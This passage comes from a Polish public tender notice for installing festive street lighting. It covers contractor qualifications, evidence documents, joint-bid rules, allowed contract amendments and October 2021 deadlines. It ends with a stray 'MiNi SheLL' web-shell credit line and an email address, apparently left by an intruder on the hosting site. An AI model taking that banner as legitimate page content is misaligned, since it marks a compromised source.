tym okresie wykonał:<br/><br/>Część I<br/> - co najmniej jedną usługę w zakresie montażu oświetlenia świątecznego ulic lub innych terenów lub obiektów lub montażu oświetlenia ozdobnego o łącznej wartości usługi nie mniejszej niż 30.000,00 zł brutto.<br/><br/>Część II<br/> - co najmniej jedną usługę w zakresie montażu oświetlenia świątecznego ulic lub innych terenów lub obiektów lub montażu oświetlenia ozdobnego o łącznej wartości usługi nie mniejszej niż 60.000,00 zł brutto.<br/><br/><br/>W przypadku składania oferty na 2 części zamówienia, Zamawiający wymaga:<br/><br/> - co najmniej jedną usługę w zakresie montażu oświetlenia świątecznego ulic lub innych <br/> terenów lub obiektów lub montażu oświetlenia ozdobnego o łącznej wartości usługi nie <br/> mniejszej niż 90.000,00 zł brutto.<br/><br/> <br/><br/> 3.4.2 dysponuje lub będzie dysponował:<br/>Część I<br/> 1) co najmniej 1 osobą posiadającą ważne świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w zakresie: obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, <br/>2) co najmniej 1 osobą posiadającą świadectwo kwalifikacyjne E uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie: obsługi, konserwacji, remontów, montażu dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa,<br/>3) co najmniej 2 osobami, które odbyły szkolenia i posiadają zaświadczenia lub kwalifikacje uprawniające do kierowania ruchem drogowym<br/> Część II<br/> 1) co najmniej 1 osobą posiadającą ważne świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w zakresie: obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, <br/>2) co najmniej 1 osoby posiadające świadectwo kwalifikacyjne E uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie: obsługi, konserwacji, remontów, montażu dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa,<br/>3) co najmniej 2 osobami, które odbyły szkolenia i posiadają zaświadczenia lub kwalifikacje uprawniające do kierowania ruchem drogowym<br/> W przypadku składania oferty na 2 części zamówienia, Zamawiający wymaga:<br/><br/> 1) co najmniej 1 osobą posiadającą ważne świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w zakresie: obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, <br/>2) co najmniej 2 osoby posiadające świadectwo kwalifikacyjne E uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie: obsługi, konserwacji, remontów, montażu dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa,<br/>3) co najmniej 2 osobami, które odbyły szkolenia i posiadają zaświadczenia lub kwalifikacje uprawniające do kierowania ruchem drogowym<br/><br/><br/>Zamawiający dopuszcza łączenia funkcji 1) i 2) przez osoby wskazane przez Wykonawcę, które będą uczestniczyć w wykonywaniu zamówienia; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania<br/>braku podstaw (przesłanek)<br/>wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia<br/>następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>- oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt<br/>4.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz usług - co najmniej jedną usługę w zakresie montażu oświetlenia świątecznego ulic lub innych terenów lub obiektów lub montażu oświetlenia ozdobnego o łącznej wartości usługi nie mniejszej niż 30.000,00 zł brutto. (dla części I)/ nie mniejszej niż 60 000,00 zł (dla części II) wykonaną w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie . W przypadku składania oferty na 2 części zamówienia, Zamawiający wymaga:- co najmniej jedną usługę w zakresie montażu oświetlenia świątecznego ulic lub innych terenów lub obiektów lub montażu oświetlenia ozdobnego o łącznej wartości usługi nie mniejszej niż 90.000,00 zł brutto wraz z zamieszczeniem dowodów, czy te usługi zostały wykonane należycie. <br/>- w celu wykazania spełniania warunku z ust. 3.4.2 wykaz osób: <br/> Część I 1) co najmniej 1 osobą posiadającą ważne świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w zakresie: obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, 2) co najmniej 1 osobą posiadającą świadectwo kwalifikacyjne E uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie: obsługi, konserwacji, remontów, montażu dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, 3) co najmniej 2 osobami, które odbyły szkolenia i posiadają zaświadczenia lub kwalifikacje uprawniające do kierowania ruchem drogowym<br/> Część II 1) co najmniej 1 osobą posiadającą ważne świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w zakresie: obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, 2) co najmniej 1 osoby posiadające świadectwo kwalifikacyjne E uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie: obsługi, konserwacji, remontów, montażu dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, 3) co najmniej 2 osobami, które odbyły szkolenia i posiadają zaświadczenia lub kwalifikacje uprawniające do kierowania ruchem drogowym.W przypadku składania oferty na 2 części zamówienia, Zamawiający wymaga: 1) co najmniej 1 osobę posiadającą ważne świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w zakresie: obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, 2) co najmniej 2 osoby posiadające świadectwo kwalifikacyjne E uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie: obsługi, konserwacji, remontów, montażu dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1kV lub odpowiadające im świadectwa lub uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, 3) co najmniej 2 osobami, które odbyły szkolenia i posiadają zaświadczenia lub kwalifikacje uprawniające do kierowania ruchem drogowym skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>1)złożenie dokumentu pełnomocnictwa dla osoby zawierającej umowę w imieniu Wykonawcy, o<br/>ile upoważnienie do reprezentowania Wykonawcy nie wynika z dokumentów rejestrowych<br/>Wykonawcy, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, lub dokument pełnomocnictwa nie został wcześniej złożony w trakcie postępowania<br/>o udzielenie zamówienia,<br/>2) w przypadku dokonania wyboru najkorzystniejszej oferty złożonej przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, złożenia umowy regulującej współpracę tych podmiotów (np. umowa konsorcjum, umowa spółki cywilnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z<br/>ofertą stosowne pełnomocnictwo – zgodnie z ust. 3.3. rozdz. 12 SWZ – nie dotyczy spółki<br/>cywilnej o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga nr 1: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod<br/>taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego<br/>pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców<br/>oświadczenie, o którym mowa w art. 125 ustawy (ust. 3.1. rozdziału 12 SWZ) składa każdy<br/>zWykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu,<br/>oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ<br/>podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do<br/>danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się<br/>oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające<br/>ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako<br/>pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na mocy art. 455 ust. 1 pkt 1 u.p.z.p. dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, złożonej w przedmiotowym postępowaniu bez przeprowadzania nowego postępowania o udzielenie zamówienia. Zamawiający dopuszcza także zmianę umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia w przypadkach opisanych w treści art. 455 ust. 1 pkt 2, 3 i 4 oraz ust. 2, 3 i 4 u.p.z.p.<br/>1.1. Okoliczności, wskazane w art. 455 ust. 1 pkt 1) u.p.z.p., tzn. takie, które zostały przewidziane w SWZ, ogłoszeniu o zamówieniu lub dokumentach zamówienia, niezależnie od wartości zmiany, w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych, które określają postanowienia dotyczące zasad wprowadzania zmian, ich zakres i charakter oraz warunki wprowadzenia zmian. Zamawiający przewiduje zatem wprowadzenie następujących zmian, określając ich zakres i tryb, oraz wskazując okoliczności, wobec wystąpienia których wymagane będzie sporządzenie stosownego aneksu do Umowy (poniższe warunki określają rodzaj i zakres zmian, warunki wprowadzania zmian i jednocześnie nie przewidują takich zmian, które modyfikowałyby ogólny charakter umowy):<br/><br/>a)	w przypadku niedostatecznego efektu wizualnego, powodującego słabą widoczność ozdób, zmiana kształtu lub wizualizacji ozdób, koloru lub barwy oświetlenia ozdób, pod warunkiem zachowania minimalnych parametrów technicznych określonych w SIWZ, i w zakresie nie większym niż 40% ilości wszystkich dekoracji, o których mowa w § 3, bez zmiany wynagrodzenia umownego Wykonawcy,<br/>b)	zmiany wynagrodzenia, wyłącznie w następstwie działań organów państwowych - ustawowa zmiana obowiązującej stawki podatku VAT lub wprowadzenie nowego podatku, wynagrodzenie brutto za usługę realizowane po dacie ustawowej zmiany stawki procentowej podatku VAT, skorygowane będzie o różnicę wartości procentowej pomiędzy uprzednią stawką VAT (obowiązującą przy podpisaniu Umowy do czasu ustawowej zmiany) i nową stawką VAT zmienioną ustawą w trakcie realizacji zamówienia,<br/>c)	w związku z wystąpieniem okoliczności niezależnych od Wykonawcy, tj. prawnych, formalnych lub zdarzeń losowych - zmiana albo rezygnacja z podwykonawcy lub wprowadzenie podwykonawcy w zakresie nie przewidzianym w treści oferty złożonej przez Wykonawcę. W przypadku podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 462 ust. 7 Ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia,<br/>d)	zmiana umownego terminu wykonania przedmiotu zamówienia wyłącznie w przypadku braku możliwości uruchomienia (włączenia) ozdób świątecznych do sieci oświetlenia ulicznego, ze względu na okoliczności niezależne i niezawinione przez Wykonawcę, a występującego po stronie TAURON S.A., pod warunkiem, że do terminu wskazanego w § 4 ust. 3 tj. do 1.12.2021 r. wszystkie ozdoby wskazane w § 3 zostaną zamontowane we wskazanych lokalizacjach i z odpowiednim wyprzedzeniem Wykonawca wystąpił do dostawcy energii i uzyskał stosowne uzgodnienia i zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-27 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-27 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com